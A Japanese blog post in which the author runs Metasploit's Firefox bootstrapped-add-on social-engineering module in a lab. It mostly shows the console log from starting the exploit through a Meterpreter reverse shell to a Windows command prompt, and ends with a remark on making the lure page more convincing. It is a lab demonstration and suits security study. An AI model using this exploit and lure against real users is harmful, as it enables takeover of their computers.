Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution

Bootstrapped extensionsに見せかけて不正なバイナリを実行させるMetaploitモジュールがリリースされていたので手元で動かしてみましたよ。Metasploitでexploit実行するとWebサービスが起動して、そこにアクセスしてきたものを攻撃するタイプのものです。

ということで環境を整えてでブラウザでアクセスしてみる。

ここで「許可」すると「インストール」の確認画面となります。

ここで「今すぐインストール」をクリックすると地獄行きとなるわけですね。

アクセスからインストールをクリック、そしてシェルを奪取するまでのMetasploit側のログはこちら。

msf exploit(firefox_xpi_bootstrapped_addon) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 10.100.0.131:4444
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://10.100.0.118:8080/
[*] Server started.
msf exploit(firefox_xpi_bootstrapped_addon) > [*] 10.100.0.180 firefox_xpi_bootstrapped_addon Handling request…
[*] 10.100.0.180 firefox_xpi_bootstrapped_addon Sending xpi and waiting for user to click ‘accept’…
[*] 10.100.0.180 firefox_xpi_bootstrapped_addon Sending xpi and waiting for user to click ‘accept’…
[*] Sending stage (752128 bytes) to 10.100.0.180
[*] Meterpreter session 1 opened (10.100.0.131:4444 -> 10.100.0.180:1291) at Fri Apr 13 11:26:29 +0900 2012

msf exploit(firefox_xpi_bootstrapped_addon) > sessions -l

Active sessions
===============

Id Type Information Connection
— —- ———– ———-
1 meterpreter x86/win32 ROOT-6952EB254C\Administrator @ ROOT-6952EB254C 10.100.0.131:4444 -> 10.100.0.180:1291 (10.100.0.180)

msf exploit(firefox_xpi_bootstrapped_addon) > sessions -i 1
[*] Starting interaction with 1…

meterpreter > shell
Process 2456 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\Mozilla Firefox>

それらしいサイトにID/PASSを入力させるよりも攻撃の成功率が低い気もしなくもないですが、アクセスページをそれらしいものにすればうまくいくかもですね。次のバージョンアップとかでSETの機能に組み込まれそうな予感。